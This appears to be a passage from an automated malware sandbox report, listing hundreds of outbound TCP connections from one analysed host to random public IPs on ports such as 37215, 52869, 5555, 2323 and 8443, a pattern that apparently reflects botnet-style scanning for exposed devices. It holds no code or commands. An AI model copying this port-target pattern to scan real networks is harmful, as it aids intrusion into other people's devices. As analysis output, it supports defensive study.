                Source: global trafficTCP traffic: 192.168.2.20:45272 -> 105.109.18.186:49152
                Source: global trafficTCP traffic: 192.168.2.20:43144 -> 29.5.215.81:37215
                Source: global trafficTCP traffic: 192.168.2.20:35236 -> 8.114.30.17:8443
                Source: global trafficTCP traffic: 192.168.2.20:39800 -> 4.186.238.93:7574
                Source: global trafficTCP traffic: 192.168.2.20:48414 -> 85.124.222.42:49152
                Source: global trafficTCP traffic: 192.168.2.20:57344 -> 13.229.32.133:7574
                Source: global trafficTCP traffic: 192.168.2.20:33480 -> 138.94.203.237:49152
                Source: global trafficTCP traffic: 192.168.2.20:60366 -> 84.219.17.176:8080
                Source: global trafficTCP traffic: 192.168.2.20:60856 -> 165.94.66.173:49152
                Source: global trafficTCP traffic: 192.168.2.20:42290 -> 163.60.176.218:8443
                Source: global trafficTCP traffic: 192.168.2.20:59730 -> 174.9.64.0:37215
                Source: global trafficTCP traffic: 192.168.2.20:50870 -> 217.196.154.24:52869
                Source: global trafficTCP traffic: 192.168.2.20:38960 -> 43.162.206.133:7574
                Source: global trafficTCP traffic: 192.168.2.20:34734 -> 79.58.62.70:8080
                Source: global trafficTCP traffic: 192.168.2.20:54256 -> 180.195.241.242:49152
                Source: global trafficTCP traffic: 192.168.2.20:55482 -> 113.203.125.76:49152
                Source: global trafficTCP traffic: 192.168.2.20:33332 -> 124.94.21.94:8443
                Source: global trafficTCP traffic: 192.168.2.20:53384 -> 125.178.212.248:81
                Source: global trafficTCP traffic: 192.168.2.20:52468 -> 181.215.101.174:49152
                Source: global trafficTCP traffic: 192.168.2.20:59820 -> 146.97.112.184:8080
                Source: global trafficTCP traffic: 192.168.2.20:56094 -> 113.237.9.87:37215
                Source: global trafficTCP traffic: 192.168.2.20:38442 -> 65.192.2.39:7574
                Source: global trafficTCP traffic: 192.168.2.20:60092 -> 83.106.49.27:81
                Source: global trafficTCP traffic: 192.168.2.20:56100 -> 100.221.5.250:8443
                Source: global trafficTCP traffic: 192.168.2.20:57922 -> 74.164.3.48:7574
                Source: global trafficTCP traffic: 192.168.2.20:39938 -> 70.83.19.226:52869
                Source: global trafficTCP traffic: 192.168.2.20:55898 -> 121.204.171.153:8443
                Source: global trafficTCP traffic: 192.168.2.20:49652 -> 61.114.5.135:8443
                Source: global trafficTCP traffic: 192.168.2.20:59844 -> 219.13.241.116:81
                Source: global trafficTCP traffic: 192.168.2.20:42368 -> 221.79.66.124:8443
                Source: global trafficTCP traffic: 192.168.2.20:50640 -> 111.176.24.214:7574
                Source: global trafficTCP traffic: 192.168.2.20:46158 -> 79.29.184.178:8080
                Source: global trafficTCP traffic: 192.168.2.20:38326 -> 158.130.170.201:37215
                Source: global trafficTCP traffic: 192.168.2.20:42426 -> 133.39.215.101:7574
                Source: global trafficTCP traffic: 192.168.2.20:34400 -> 95.245.196.212:8080
                Source: global trafficTCP traffic: 192.168.2.20:41906 -> 15.115.105.212:7574
                Source: global trafficTCP traffic: 192.168.2.20:46340 -> 199.218.221.131:49152
                Source: global trafficTCP traffic: 192.168.2.20:58966 -> 173.150.244.104:81
                Source: global trafficTCP traffic: 192.168.2.20:37704 -> 157.94.79.109:5555
                Source: global trafficTCP traffic: 192.168.2.20:44436 -> 137.81.200.232:5555
                Source: global trafficTCP traffic: 192.168.2.20:51872 -> 101.196.228.55:81
                Source: global trafficTCP traffic: 192.168.2.20:46588 -> 187.188.141.244:81
                Source: global trafficTCP traffic: 192.168.2.20:40230 -> 90.205.13.29:8080
                Source: global trafficTCP traffic: 192.168.2.20:58940 -> 29.150.145.46:5555
                Source: global trafficTCP traffic: 192.168.2.20:41558 -> 92.77.238.132:49152
                Source: global trafficTCP traffic: 192.168.2.20:58142 -> 168.120.224.251:7574
                Source: global trafficTCP traffic: 192.168.2.20:50236 -> 95.75.250.127:8080
                Source: global trafficTCP traffic: 192.168.2.20:32984 -> 196.95.13.165:81
                Source: global trafficTCP traffic: 192.168.2.20:54874 -> 167.55.9.142:8080
                Source: global trafficTCP traffic: 192.168.2.20:57612 -> 196.37.30.71:8443
                Source: global trafficTCP traffic: 192.168.2.20:58382 -> 84.138.43.63:7574
                Source: global trafficTCP traffic: 192.168.2.20:53924 -> 150.78.74.139:8080
                Source: global trafficTCP traffic: 192.168.2.20:34402 -> 90.251.63.152:8080
                Source: global trafficTCP traffic: 192.168.2.20:53456 -> 92.171.56.228:49152
                Source: global trafficTCP traffic: 192.168.2.20:36200 -> 152.1.210.168:5555
                Source: global trafficTCP traffic: 192.168.2.20:52424 -> 181.63.57.94:7574
                Source: global trafficTCP traffic: 192.168.2.20:40720 -> 82.134.248.77:37215
                Source: global trafficTCP traffic: 192.168.2.20:34142 -> 186.149.104.105:52869
                Source: global trafficTCP traffic: 192.168.2.20:48984 -> 166.120.234.132:81
                Source: global trafficTCP traffic: 192.168.2.20:45526 -> 148.53.105.39:37215
                Source: global trafficTCP traffic: 192.168.2.20:39264 -> 34.46.25.239:52869
                Source: global trafficTCP traffic: 192.168.2.20:53420 -> 122.96.117.78:8443
                Source: global trafficTCP traffic: 192.168.2.20:42746 -> 2.24.204.7:5555
                Source: global trafficTCP traffic: 192.168.2.20:54634 -> 206.112.48.85:8080
                Source: global trafficTCP traffic: 192.168.2.20:35258 -> 221.97.211.57:81
                Source: global trafficTCP traffic: 192.168.2.20:51844 -> 132.228.243.137:52869
                Source: global trafficTCP traffic: 192.168.2.20:59118 -> 118.33.128.115:8080
                Source: global trafficTCP traffic: 192.168.2.20:51128 -> 64.134.176.11:8080
                Source: global trafficTCP traffic: 192.168.2.20:43806 -> 148.228.211.150:37215
                Source: global trafficTCP traffic: 192.168.2.20:37272 -> 87.76.103.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:55578 -> 47.25.134.25:8443
                Source: global trafficTCP traffic: 192.168.2.20:46920 -> 191.200.219.2:7574
                Source: global trafficTCP traffic: 192.168.2.20:47240 -> 180.142.151.223:49152
                Source: global trafficTCP traffic: 192.168.2.20:52002 -> 37.198.54.7:5555
                Source: global trafficTCP traffic: 192.168.2.20:58734 -> 14.98.32.156:81
                Source: global trafficTCP traffic: 192.168.2.20:39050 -> 47.238.39.43:5555
                Source: global trafficTCP traffic: 192.168.2.20:34252 -> 29.198.53.231:8080
                Source: global trafficTCP traffic: 192.168.2.20:59336 -> 84.49.20.203:37215
                Source: global trafficTCP traffic: 192.168.2.20:39838 -> 86.146.123.31:5555
                Source: global trafficTCP traffic: 192.168.2.20:59832 -> 32.217.189.23:7574
                Source: global trafficTCP traffic: 192.168.2.20:47362 -> 182.150.145.27:37215
                Source: global trafficTCP traffic: 192.168.2.20:42540 -> 37.25.2.203:8443
                Source: global trafficTCP traffic: 192.168.2.20:34066 -> 146.53.108.229:7574
                Source: global trafficTCP traffic: 192.168.2.20:38360 -> 167.105.144.22:7574
                Source: global trafficTCP traffic: 192.168.2.20:60418 -> 132.254.4.175:8443
                Source: global trafficTCP traffic: 192.168.2.20:43554 -> 96.186.107.158:52869
                Source: global trafficTCP traffic: 192.168.2.20:35612 -> 54.87.34.198:5555
                Source: global trafficTCP traffic: 192.168.2.20:45608 -> 24.87.139.212:37215
                Source: global trafficTCP traffic: 192.168.2.20:51162 -> 23.95.18.129:7574
                Source: global trafficTCP traffic: 192.168.2.20:56194 -> 193.223.49.13:81
                Source: global trafficTCP traffic: 192.168.2.20:34122 -> 80.223.16.203:7574
                Source: global trafficTCP traffic: 192.168.2.20:37600 -> 149.88.110.90:7574
                Source: global trafficTCP traffic: 192.168.2.20:49262 -> 183.182.79.172:7574
                Source: global trafficTCP traffic: 192.168.2.20:56704 -> 82.179.61.132:8080
                Source: global trafficTCP traffic: 192.168.2.20:52170 -> 185.32.224.106:8080
                Source: global trafficTCP traffic: 192.168.2.20:51884 -> 4.122.58.30:37215
                Source: global trafficTCP traffic: 192.168.2.20:38142 -> 171.156.169.94:8443
                Source: global trafficTCP traffic: 192.168.2.20:50394 -> 189.124.245.91:37215
                Source: global trafficTCP traffic: 192.168.2.20:40552 -> 137.33.28.160:52869
                Source: global trafficTCP traffic: 192.168.2.20:46764 -> 160.49.32.226:49152
                Source: global trafficTCP traffic: 192.168.2.20:49828 -> 77.188.2.23:49152
                Source: global trafficTCP traffic: 192.168.2.20:60188 -> 39.70.239.74:8443
                Source: global trafficTCP traffic: 192.168.2.20:38156 -> 153.251.110.103:8080
                Source: global trafficTCP traffic: 192.168.2.20:37816 -> 6.158.170.206:49152
                Source: global trafficTCP traffic: 192.168.2.20:44044 -> 102.239.181.86:8443
                Source: global trafficTCP traffic: 192.168.2.20:51112 -> 138.244.0.154:8080
                Source: global trafficTCP traffic: 192.168.2.20:50090 -> 56.89.187.128:52869
                Source: global trafficTCP traffic: 192.168.2.20:38736 -> 193.74.200.139:8080
                Source: global trafficTCP traffic: 192.168.2.20:49988 -> 50.160.226.168:5555
                Source: global trafficTCP traffic: 192.168.2.20:32842 -> 93.58.202.130:7574
                Source: global trafficTCP traffic: 192.168.2.20:52204 -> 65.114.175.95:81
                Source: global trafficTCP traffic: 192.168.2.20:49222 -> 201.144.37.239:7574
                Source: global trafficTCP traffic: 192.168.2.20:39886 -> 153.215.244.192:8080
                Source: global trafficTCP traffic: 192.168.2.20:55388 -> 177.16.24.154:8080
                Source: global trafficTCP traffic: 192.168.2.20:58490 -> 26.139.153.168:37215
                Source: global trafficTCP traffic: 192.168.2.20:54464 -> 193.215.254.49:5555
                Source: global trafficTCP traffic: 192.168.2.20:45310 -> 9.244.6.205:5555
                Source: global trafficTCP traffic: 192.168.2.20:45620 -> 126.17.192.94:8443
                Source: global trafficTCP traffic: 192.168.2.20:55314 -> 89.246.214.5:81
                Source: global trafficTCP traffic: 192.168.2.20:38496 -> 113.178.32.186:7574
                Source: global trafficTCP traffic: 192.168.2.20:42012 -> 22.111.96.211:8443
                Source: global trafficTCP traffic: 192.168.2.20:55546 -> 129.177.173.85:52869
                Source: global trafficTCP traffic: 192.168.2.20:51724 -> 194.45.74.136:8080
                Source: global trafficTCP traffic: 192.168.2.20:52062 -> 217.175.214.110:8080
                Source: global trafficTCP traffic: 192.168.2.20:52990 -> 185.57.154.59:49152
                Source: global trafficTCP traffic: 192.168.2.20:56420 -> 103.119.246.183:8080
                Source: global trafficTCP traffic: 192.168.2.20:56202 -> 210.7.21.57:8080
                Source: global trafficTCP traffic: 192.168.2.20:39758 -> 46.254.1.124:52869
                Source: global trafficTCP traffic: 192.168.2.20:46990 -> 83.190.231.93:37215
                Source: global trafficTCP traffic: 192.168.2.20:39368 -> 24.209.150.53:8080
                Source: global trafficTCP traffic: 192.168.2.20:60754 -> 14.106.178.189:52869
                Source: global trafficTCP traffic: 192.168.2.20:57620 -> 21.1.86.6:8080
                Source: global trafficTCP traffic: 192.168.2.20:54840 -> 29.210.78.250:8080
                Source: global trafficTCP traffic: 192.168.2.20:51062 -> 9.214.29.162:8080
                Source: global trafficTCP traffic: 192.168.2.20:52094 -> 59.238.28.165:8080
                Source: global trafficTCP traffic: 192.168.2.20:33122 -> 23.136.108.3:5555
                Source: global trafficTCP traffic: 192.168.2.20:52764 -> 39.150.243.95:8080
                Source: global trafficTCP traffic: 192.168.2.20:58240 -> 95.235.124.24:8080
                Source: global trafficTCP traffic: 192.168.2.20:37498 -> 162.248.240.36:8080
                Source: global trafficTCP traffic: 192.168.2.20:49178 -> 37.192.71.218:8080
                Source: global trafficTCP traffic: 192.168.2.20:60294 -> 203.154.69.97:8080
                Source: global trafficTCP traffic: 192.168.2.20:44870 -> 26.95.223.242:49152
                Source: global trafficTCP traffic: 192.168.2.20:49784 -> 207.209.5.215:81
                Source: global trafficTCP traffic: 192.168.2.20:35608 -> 65.18.49.14:5555
                Source: global trafficTCP traffic: 192.168.2.20:56108 -> 160.116.99.47:52869
                Source: global trafficTCP traffic: 192.168.2.20:57424 -> 207.36.97.217:8080
                Source: global trafficTCP traffic: 192.168.2.20:60416 -> 126.241.242.120:37215
                Source: global trafficTCP traffic: 192.168.2.20:45724 -> 180.222.24.104:5555
                Source: global trafficTCP traffic: 192.168.2.20:34852 -> 1.249.43.22:8080
                Source: global trafficTCP traffic: 192.168.2.20:33926 -> 113.37.245.122:49152
                Source: global trafficTCP traffic: 192.168.2.20:43820 -> 83.26.49.216:8080
                Source: global trafficTCP traffic: 192.168.2.20:53818 -> 218.1.134.21:49152
                Source: global trafficTCP traffic: 192.168.2.20:36190 -> 94.202.222.110:52869
                Source: global trafficTCP traffic: 192.168.2.20:55414 -> 163.224.207.250:37215
                Source: global trafficTCP traffic: 192.168.2.20:50874 -> 165.192.86.199:8080
                Source: global trafficTCP traffic: 192.168.2.20:47924 -> 47.97.84.96:5555
                Source: global trafficTCP traffic: 192.168.2.20:36000 -> 98.76.121.141:8443
                Source: global trafficTCP traffic: 192.168.2.20:56512 -> 5.253.168.79:8080
                Source: global trafficTCP traffic: 192.168.2.20:60868 -> 159.199.114.171:7574
                Source: global trafficTCP traffic: 192.168.2.20:42254 -> 21.186.96.232:8080
                Source: global trafficTCP traffic: 192.168.2.20:52564 -> 63.193.129.128:8080
                Source: global trafficTCP traffic: 192.168.2.20:48530 -> 142.143.222.228:49152
                Source: global trafficTCP traffic: 192.168.2.20:45344 -> 159.117.140.27:5555
                Source: global trafficTCP traffic: 192.168.2.20:43498 -> 159.162.153.137:37215
                Source: global trafficTCP traffic: 192.168.2.20:53998 -> 93.191.87.190:8080
                Source: global trafficTCP traffic: 192.168.2.20:50786 -> 108.222.27.30:7574
                Source: global trafficTCP traffic: 192.168.2.20:56256 -> 69.247.179.164:8080
                Source: global trafficTCP traffic: 192.168.2.20:42292 -> 17.188.17.96:8443
                Source: global trafficTCP traffic: 192.168.2.20:38076 -> 120.218.153.188:5555
                Source: global trafficTCP traffic: 192.168.2.20:40178 -> 177.237.69.156:8443
                Source: global trafficTCP traffic: 192.168.2.20:34046 -> 116.13.184.201:8080
                Source: global trafficTCP traffic: 192.168.2.20:33188 -> 121.120.108.73:8080
                Source: global trafficTCP traffic: 192.168.2.20:51562 -> 18.24.141.168:7574
                Source: global trafficTCP traffic: 192.168.2.20:39098 -> 166.55.57.24:8080
                Source: global trafficTCP traffic: 192.168.2.20:38220 -> 24.105.81.145:81
                Source: global trafficTCP traffic: 192.168.2.20:52676 -> 61.67.234.110:49152
                Source: global trafficTCP traffic: 192.168.2.20:46246 -> 124.22.25.41:7574
                Source: global trafficTCP traffic: 192.168.2.20:57714 -> 90.85.134.44:81
                Source: global trafficTCP traffic: 192.168.2.20:53760 -> 77.25.98.191:81
                Source: global trafficTCP traffic: 192.168.2.20:34962 -> 197.167.218.125:8080
                Source: global trafficTCP traffic: 192.168.2.20:40784 -> 76.209.219.87:8443
                Source: global trafficTCP traffic: 192.168.2.20:46100 -> 69.110.51.44:8443
                Source: global trafficTCP traffic: 192.168.2.20:55020 -> 147.139.103.203:7574
                Source: global trafficTCP traffic: 192.168.2.20:51804 -> 170.147.88.37:81
                Source: global trafficTCP traffic: 192.168.2.20:34932 -> 21.229.198.23:7574
                Source: global trafficTCP traffic: 192.168.2.20:32774 -> 47.83.189.211:37215
                Source: global trafficTCP traffic: 192.168.2.20:47434 -> 119.97.159.234:81
                Source: global trafficTCP traffic: 192.168.2.20:57750 -> 142.66.89.80:8080
                Source: global trafficTCP traffic: 192.168.2.20:54354 -> 5.182.95.91:8443
                Source: global trafficTCP traffic: 192.168.2.20:50732 -> 204.7.247.28:52869
                Source: global trafficTCP traffic: 192.168.2.20:59964 -> 77.190.22.139:49152
                Source: global trafficTCP traffic: 192.168.2.20:56096 -> 137.38.149.182:8080
                Source: global trafficTCP traffic: 192.168.2.20:35162 -> 173.27.94.3:8080
                Source: global trafficTCP traffic: 192.168.2.20:47922 -> 18.119.229.111:5555
                Source: global trafficTCP traffic: 192.168.2.20:33810 -> 91.97.247.73:5555
                Source: global trafficTCP traffic: 192.168.2.20:41594 -> 71.132.177.20:8080
                Source: global trafficTCP traffic: 192.168.2.20:34350 -> 157.100.221.142:7574
                Source: global trafficTCP traffic: 192.168.2.20:36164 -> 152.39.226.53:7574
                Source: global trafficTCP traffic: 192.168.2.20:37252 -> 25.97.66.170:8080
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 34.30.246.129:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 72.193.100.130:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 191.130.205.66:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 168.204.132.3:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 135.234.161.92:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 112.246.212.82:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 165.200.2.58:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 110.14.87.91:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 69.122.31.78:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 128.13.11.190:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 63.34.109.151:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 207.13.36.47:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 117.25.72.12:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 165.218.11.121:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 117.134.250.209:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 58.128.23.30:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 13.201.155.93:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 18.115.11.94:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 156.48.180.246:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 182.202.90.106:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 195.166.0.203:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 184.155.146.118:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 76.87.157.247:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 203.161.28.140:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 106.45.219.74:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 74.210.56.125:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 113.24.69.141:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 144.65.254.202:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 217.86.72.178:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 212.86.101.169:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 156.167.187.20:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 110.180.211.39:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 105.250.71.183:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 113.117.19.31:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 190.79.231.15:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 216.51.208.52:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 219.250.235.42:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 101.228.8.80:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 188.156.60.139:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 20.53.214.183:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 109.102.41.71:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 38.185.158.237:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 161.185.182.176:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 155.94.214.223:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 171.229.255.155:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 59.170.49.101:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 76.18.135.232:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 87.46.40.109:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 194.99.193.132:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 165.139.243.212:2323
                Source: global trafficTCP traffic: 192.168.2.20:55946 -> 204.109.84.136:81
                Source: global trafficTCP traffic: 192.168.2.20:35348 -> 31.193.226.180:8080
                Source: global trafficTCP traffic: 192.168.2.20:54052 -> 44.10.103.216:5555
                Source: global trafficTCP traffic: 192.168.2.20:57812 -> 93.181.246.124:5555
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 154.6.180.223:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 141.139.80.101:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 2.230.195.56:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 223.97.173.137:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 217.240.242.190:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 203.83.23.203:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 79.208.167.77:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 42.145.28.245:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 65.31.148.132:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 47.122.79.104:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 65.242.108.69:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 112.119.61.98:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 41.49.78.125:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 195.230.69.221:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 63.52.115.246:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 126.30.13.96:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 105.77.104.149:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 18.230.18.46:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 2.244.147.91:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 185.172.74.196:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 216.145.209.20:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 17.126.4.235:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 121.28.54.241:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 9.244.15.80:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 44.18.123.183:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 169.152.233.0:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 100.141.74.188:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 118.236.95.38:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 178.202.58.218:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 76.193.220.157:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 92.20.133.175:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 102.142.214.179:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 88.238.140.155:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 97.150.200.170:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 180.170.49.199:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 164.164.43.169:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 114.246.247.40:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 204.33.185.101:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 85.191.251.134:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 212.132.188.177:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 218.32.181.216:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 110.253.81.237:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 162.95.29.118:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 70.202.218.130:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 213.195.7.12:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 57.43.198.84:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 84.54.89.100:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 86.87.253.62:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 195.112.142.130:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 91.159.184.30:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 79.73.229.27:2323
                Source: global trafficTCP traffic: 192.168.2.20:55758 -> 29.166.118.161:52869
                Source: global trafficTCP traffic: 192.168.2.20:47432 -> 98.165.182.239:37215
                Source: global trafficTCP traffic: 192.168.2.20:47526 -> 55.39.75.135:8443
                Source: global trafficTCP traffic: 192.168.2.20:54462 -> 27.51.109.17:5555
                Source: global trafficTCP traffic: 192.168.2.20:40436 -> 35.162.94.106:8080
                Source: global trafficTCP traffic: 192.168.2.20:54238 -> 140.140.91.170:8443
                Source: global trafficTCP traffic: 192.168.2.20:34834 -> 25.158.113.102:49152
                Source: global trafficTCP traffic: 192.168.2.20:34392 -> 6.106.120.182:81
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 106.127.147.213:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 176.92.243.205:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 34.128.35.111:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 193.107.186.95:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 115.120.194.236:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 20.118.133.18:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 149.239.53.87:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 156.220.244.53:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 208.111.56.155:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 57.252.155.151:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 152.239.97.46:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 152.221.34.124:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 119.64.213.236:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 92.124.231.59:1023
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 146.6.49.32:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 73.212.135.84:2323
                Source: global trafficTCP traffic: 192.168.2.20:51003 -> 114.5.151.204:2323
                Source: global trafficTCP traffic: 192.168.2.20:52256 -> 43.42.84.127:8443
                Source: global trafficTCP traffic: 192.168.2.20:45708 -> 77.173.227.171:8080
                Source: global trafficTCP traffic: 192.168.2.20:43850 -> 61.143.240.243:8080
                Source: global trafficTCP traffic: 192.168.2.20:36238 -> 101.33.206.177:8080
                Source: global trafficTCP traffic: 192.168.2.20:50218 -> 63.168.39.202:52869
                Source: global trafficTCP traffic: 192.168.2.20:38574 -> 7.252.25.102:52869
                Source: global trafficTCP traffic: 192.168.2.20:47766 -> 165.183.156.14:37215
                Source: global trafficTCP traffic: 192.168.2.20:44144 -> 99.222.192.3:49152
                Source: global trafficTCP traffic: 192.168.2.20:52860 -> 97.72.143.47:52869
                Source: global trafficTCP traffic: 192.168.2.20:54286 -> 142.89.68.59:52869
                Source: global trafficTCP traffic: 192.168.2.20:40208 -> 83.101.228.252:7574
                Source: global trafficTCP traffic: 192.168.2.20:50208 -> 189.28.141.200:5555
                Source: global trafficTCP traffic: 192.168.2.20:46134 -> 137.41.148.60:7574
                Source: global trafficTCP traffic: 192.168.2.20:32854 -> 38.79.244.233:8080
                Source: global trafficTCP traffic: 192.168.2.20:34252 -> 83.191.87.167:49152
                Source: global trafficTCP traffic: 192.168.2.20:55768 -> 174.204.143.88:81
                Source: global trafficTCP traffic: 192.168.2.20:50406 -> 55.112.46.169:8080
                Source: global trafficTCP traffic: 192.168.2.20:41968 -> 174.242.148.233:49152
                Source: global trafficTCP traffic: 192.168.2.20:33648 -> 182.32.81.51:7574
                Source: global trafficTCP traffic: 192.168.2.20:39742 -> 214.19.91.180:8080
                Source: global trafficTCP traffic: 192.168.2.20:41504 -> 28.8.96.182:8443
                Source: global trafficTCP traffic: 192.168.2.20:48764 -> 211.150.15.80:8080
                Source: global trafficTCP traffic: 192.168.2.20:50900 -> 67.222.221.70:8080
                Source: global trafficTCP traffic: 192.168.2.20:60388 -> 186.4.165.144:8080
                Source: global trafficTCP traffic: 192.168.2.20:60972 -> 63.80.240.64:49152
                Source: global trafficTCP traffic: 192.168.2.20:44482 -> 20.119.144.2:52869
                Source: global trafficTCP traffic: 192.168.2.20:36244 -> 71.204.5.240:49152
                Source: global trafficTCP traffic: 192.168.2.20:45864 -> 53.165.88.238:8443
                Source: global trafficTCP traffic: 192.168.2.20:44920 -> 99.127.24.157:37215
                Source: global trafficTCP traffic: 192.168.2.20:53988 -> 211.121.75.90:8080
                Source: global trafficTCP traffic: 192.168.2.20:52446 -> 106.219.59.104:81
                Source: global trafficTCP traffic: 192.168.2.20:52648 -> 184.241.148.254:5555
                Source: global trafficTCP traffic: 192.168.2.20:39806 -> 92.242.40.195:81
                Source: global trafficTCP traffic: 192.168.2.20:49890 -> 155.6.95.108:8443
                Source: global trafficTCP traffic: 192.168.2.20:33156 -> 124.236.254.90:37215
                Source: global trafficTCP traffic: 192.168.2.20:40492 -> 141.206.254.140:8080
                Source: global trafficTCP traffic: 192.168.2.20:36596 -> 52.240.164.145:37215
